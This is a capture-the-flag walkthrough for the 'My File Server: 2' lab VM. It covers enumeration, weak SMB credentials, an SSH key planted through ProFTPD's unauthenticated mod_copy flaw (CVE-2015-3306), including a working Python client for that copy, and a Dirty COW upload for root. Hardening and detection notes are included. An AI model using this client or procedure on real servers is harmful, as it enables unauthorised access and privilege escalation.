My_file_server_2

description

Welcome to “My File Server : 2”
This boot2root machine is the Second Challenge of the “My File Server” series. This is a realistic File Server with some interesting loopholes. As its name suggests, you will get many File Sharing Services and their privileges to play with.
Goal: Get the Root access of the Vulnerable Server.
Difficulty: Easy / Beginner Level
Need hints? Twitter @akankshavermasv
DHCP is enabled
Your feedback is really valuable for me! Twitter @akankshavermasv
Was there something that you didn’t like about this VM?
Please let me know so that I can make more interesting challenges in the future.
Good Luck..!!!

Write-Up

The lab setup is as follows:

Sweep vmnet1 for live hosts:
hausa@debian:~$ fping -asg 172.16.1.1/24
172.16.1.1
172.16.1.131

Scan 172.16.1.131 (all TCP ports, with service and script detection):
hausa@debian:~$ nmap -A -p 1-65535 172.16.1.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 02:30 EDT
Nmap scan report for 172.16.1.131
Host is up (0.00049s latency).
Not shown: 64523 filtered ports, 1004 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 3 0 0 16 Feb 19 07:48 pub [NSE: writeable]

……
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 ……
80/tcp open http Apache httpd 2.4.6 ((CentOS))
……
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: FILESERVER; OS: Unix
Host script results:
|_clock-skew: mean: -1h50m01s, deviation: 3h10m30s, median: -2s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2020-08-16T12:22:19+05:30
| smb-security-mode:
|   account_used:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-16T06:52:21
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1287.34 seconds

Open ports: 21/ftp (anonymous login allowed), 22/ssh, 80/http, 111/rpcbind, 445/smb, 2049/nfs_acl, 2121/ftp (anonymous login allowed), 20048/mountd.
Start with the usual port 80. Visiting it in a browser turns up nothing useful.
Run dirsearch against it:
hausa@debian:~/tools/dirsearch$ python3 dirsearch.py -u 172.16.1.131 -e *
……
[06:51:04] 403 – 210B – /cgi-bin/
[06:51:05] 200 – 174B – /index.html
[06:51:07] 200 – 25B – /readme.txt
Task Completed

There is a readme.txt; fetching it gives:
My Password is
rootroot1

Tried root/rootroot1 against SSH on port 22: the server wants a public key, so the password gets nowhere.
The wtmp file on the anonymous FTP share, ftp://172.16.1.131/pub/log/wtmp, reveals a user named smbuser:
hausa@debian:~/Downloads$ last -f wtmp
……
smbuser pts/1 192.168.1.5 Wed Feb 19 00:11 – 00:11 (00:00)
……
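The `last -f wtmp` step above works because wtmp is just an array of fixed-size login records. As an added example (not code from the write-up), here is a small reader for that format that pulls user names and source hosts out of a wtmp file grabbed from a share, without needing `last`. The layout is glibc's struct utmp on x86_64 (384-byte records); the sample records are constructed for the demo, not copied from the VM.

```python
# Added example: parse Linux wtmp/utmp records to harvest login user names.
# Record layout is glibc's struct utmp on x86_64 (384 bytes); sample data is
# constructed here, not taken from the target.
import struct
import time

# struct utmp, x86_64 glibc: type, pad, pid, line[32], id[4], user[32],
# host[256], exit (two shorts), session, tv_sec, tv_usec, addr_v6[4], unused[20]
UTMP_FORMAT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FORMAT)  # 384

BOOT_TIME = 2      # "reboot" pseudo-entry, user field is not a real account
USER_PROCESS = 7   # an actual login: the record type that leaks user names
DEAD_PROCESS = 8   # logout of the tty named in ut_line


def _cstr(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", errors="replace")


def parse_wtmp(data):
    """Yield one dict per complete record; a trailing partial record is ignored."""
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        fields = struct.unpack_from(UTMP_FORMAT, data, off)
        ut_type, pid, line, _ident, user, host, _term, _exit, _sess, tv_sec = fields[:10]
        yield {
            "type": ut_type,
            "pid": pid,
            "line": _cstr(line),
            "user": _cstr(user),
            "host": _cstr(host),
            "time": time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(tv_sec)),
        }


def login_users(data):
    """Map each account that really logged in to the sorted list of source
    hosts, skipping reboot/shutdown pseudo-entries and logout records."""
    seen = {}
    for rec in parse_wtmp(data):
        if rec["type"] != USER_PROCESS or not rec["user"]:
            continue
        seen.setdefault(rec["user"], set()).add(rec["host"])
    return {u: sorted(h) for u, h in seen.items()}


def login_users_from_file(path):
    """Same as login_users, reading a wtmp file downloaded from a share."""
    with open(path, "rb") as fh:
        return login_users(fh.read())


def make_record(ut_type, pid, line, user, host, tv_sec):
    """Pack one record; only used to build the constructed sample below."""
    return struct.pack(UTMP_FORMAT, ut_type, pid, line.encode(), b"",
                       user.encode(), host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0)


# Constructed sample: a boot, two logins, one logout (timestamps are 2020-02-19 UTC).
SAMPLE_WTMP = b"".join([
    make_record(BOOT_TIME, 0, "~", "reboot", "3.10.0", 1582070000),
    make_record(USER_PROCESS, 1201, "pts/0", "root", "192.168.1.10", 1582070100),
    make_record(USER_PROCESS, 1330, "pts/1", "smbuser", "192.168.1.5", 1582070700),
    make_record(DEAD_PROCESS, 1330, "pts/1", "", "", 1582070760),
])

if __name__ == "__main__":
    for rec in parse_wtmp(SAMPLE_WTMP):
        print(rec)
    print(login_users(SAMPLE_WTMP))
```

The format string is the x86_64 glibc layout; a wtmp from a 32-bit or non-glibc system has a different record size, so check `len(data) % 384 == 0` before trusting the output.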

Nothing else useful turned up on the FTP share.
Tried smbuser/rootroot1 on FTP; it does not work.
Try 445/SMB next:
hausa@debian:~$ smbclient -L 172.16.1.131
Enter WORKGROUP\hausa's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbdata Disk smbdata
smbuser Disk smbuser
IPC$ IPC IPC Service (Samba 4.9.1)

SMB1 disabled -- no workgroup available

Logging in as smbuser with smbuser as the password (username reused as password) works, and the share yields the sshd_config file:
......
AuthorizedKeysFile .ssh/authorized_keys
......
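Why that one line matters (added note, not part of the write-up): with the default `AuthorizedKeysFile`, sshd reads the trusted keys from a file inside the user's own home directory, so anything that can write into /home/smbuser/.ssh decides who may log in as smbuser. A common hardening, shown here for contrast as an assumed configuration, keeps the keys under a root-owned path instead:

```text
# Default, as in the leaked sshd_config: per-user file under the home directory,
# so any write primitive into the home directory (FTP, SMB, a copy bug) grants SSH access
AuthorizedKeysFile .ssh/authorized_keys

# Hardened alternative: keys live in a root-owned, non-user-writable directory;
# %u expands to the login name. StrictModes (default yes) additionally refuses
# key files and parent directories that are group- or world-writable.
AuthorizedKeysFile /etc/ssh/authorized_keys/%u
StrictModes yes
```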

Upload a public key generated with ssh-keygen to the smbdata share (it lands at /smbdata/id_rsa.pub on the server), then use the file copy that ProFTPD 1.3.5 allows without authentication (mod_copy, SITE CPFR/CPTO, CVE-2015-3306) to copy it over smbuser's authorized_keys, and log in over SSH with the matching private key:
hausa@debian:~/.ssh$ ftp 172.16.1.131 2121
Connected to 172.16.1.131.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [172.16.1.131]
Name (172.16.1.131:hausa): aefda
331 Password required for a
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site cpfr /smbdata/id_rsa.pub
350 File or directory exists, ready for destination name
ftp> site cpto /home/smbuser/.ssh/authorized_keys
250 Copy successful
ftp> exit
221 Goodbye.
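The transcript above is the whole bug in four lines: the login is rejected, yet SITE CPFR and SITE CPTO are still honoured. As an added example (not code from the write-up or from ProFTPD), the block below reproduces that control-channel exchange in Python, with a client that never authenticates, plus a constructed stand-in server that behaves like the vulnerable daemon so the exchange can be run and checked offline. The host, paths and key text are assumptions for the demo.

```python
# Added example: the unauthenticated SITE CPFR / SITE CPTO copy from the
# transcript (mod_copy, CVE-2015-3306 in ProFTPD 1.3.5), driven from Python,
# against a constructed stand-in that mimics the vulnerable daemon.
import socket
import socketserver
import threading

PUBKEY = b"ssh-rsa AAAAB3NzaC1yc2E-constructed-demo-key hausa@debian\n"  # not a real key


def ftp_reply(rf):
    """Read one reply line (every reply in this exchange is single-line)."""
    return rf.readline().decode("utf-8", errors="replace").rstrip("\r\n")


def copy_without_login(host, port, src, dst, timeout=5.0):
    """Skip USER/PASS entirely and ask the server to copy src to dst.
    Returns (banner, cpfr_reply, cpto_reply, copied)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        rf = s.makefile("rb")
        banner = ftp_reply(rf)
        s.sendall(f"SITE CPFR {src}\r\n".encode())
        cpfr = ftp_reply(rf)
        cpto = None
        if cpfr.startswith("350"):            # 350 = "ready for destination name"
            s.sendall(f"SITE CPTO {dst}\r\n".encode())
            cpto = ftp_reply(rf)
        s.sendall(b"QUIT\r\n")
        ftp_reply(rf)
        return banner, cpfr, cpto, bool(cpto and cpto.startswith("250"))


class _VulnHandler(socketserver.StreamRequestHandler):
    """Stand-in for the bug: SITE CPFR/CPTO are honoured before any login."""

    def handle(self):
        self.wfile.write(b"220 ProFTPD 1.3.5 Server (constructed stand-in)\r\n")
        pending = None
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            verb, _, arg = raw.decode("utf-8", errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "USER":
                reply = f"331 Password required for {arg}"
            elif verb == "PASS":
                reply = "530 Login incorrect."
            elif verb == "QUIT":
                self.wfile.write(b"221 Goodbye.\r\n")
                return
            elif verb == "SITE":
                sub, _, path = arg.partition(" ")
                sub = sub.upper()
                files = self.server.files
                if sub == "CPFR":
                    if path in files:
                        pending = path
                        reply = "350 File or directory exists, ready for destination name"
                    else:
                        reply = f"550 {path}: No such file or directory"
                elif sub == "CPTO":
                    if pending is None:
                        reply = "503 Bad sequence of commands"
                    else:
                        files[path] = files[pending]     # the unauthenticated write
                        pending = None
                        reply = "250 Copy successful"
                else:
                    reply = "500 'SITE': command not understood"
            else:
                reply = "530 Please login with USER and PASS"
            self.wfile.write((reply + "\r\n").encode())


class FakeProftpd(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, files):
        super().__init__(("127.0.0.1", 0), _VulnHandler)
        self.files = dict(files)   # path -> bytes: the stand-in "filesystem"


def run_demo():
    """Start the stand-in, run the copy against it, report what happened."""
    srv = FakeProftpd({"/smbdata/id_rsa.pub": PUBKEY})
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        host, port = srv.server_address
        target = "/home/smbuser/.ssh/authorized_keys"
        hit = copy_without_login(host, port, "/smbdata/id_rsa.pub", target)
        miss = copy_without_login(host, port, "/smbdata/does-not-exist", target)
        return {"hit": hit, "miss": miss, "authorized_keys": srv.files.get(target)}
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, v)
```

Against the real VM the same client call is `copy_without_login("172.16.1.131", 2121, "/smbdata/id_rsa.pub", "/home/smbuser/.ssh/authorized_keys")`; the copy runs with whatever privileges the daemon has, which is why it can write into another user's home. On the server side the fix is ProFTPD 1.3.5a or later, or not loading mod_copy at all; for detection, SITE CPFR/CPTO in the ProFTPD log with no preceding successful login is the tell.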

hausa@debian:~/.ssh$ ssh -l smbuser 172.16.1.131
……
Last login: Mon Aug 17 00:44:30 2020

[smbuser@fileserver ~]$
After landing the shell, the usual checks show kernel 3.10.0, which can be exploited for privilege escalation. (Caveat: CentOS 7 keeps the 3.10.0 version string across years of backported fixes, so compare the full `uname -r` build against the exploit's advisory rather than trusting the major version alone.)
Upload the exploit over SMB and compile it in the shell (exploit-db 40616.c is the Dirty COW, CVE-2016-5195, SUID-binary variant):
smb: > put /usr/share/exploitdb/exploits/linux/local/40616.c tiquan
putting file /usr/share/exploitdb/exploits/linux/local/40616.c as \tiquan (93.2 kb/s) (average 93.2 kb/s)

The final result:

Summary

~ Some people use the scanners nbtscan and enum4linux; their output is very detailed and worth trying next time.
~ Following security news and regularly reproducing known vulnerabilities matters.
~ Sometimes it is worth trying the username as the password.
~ When will I ever dig up a 0day, hahaha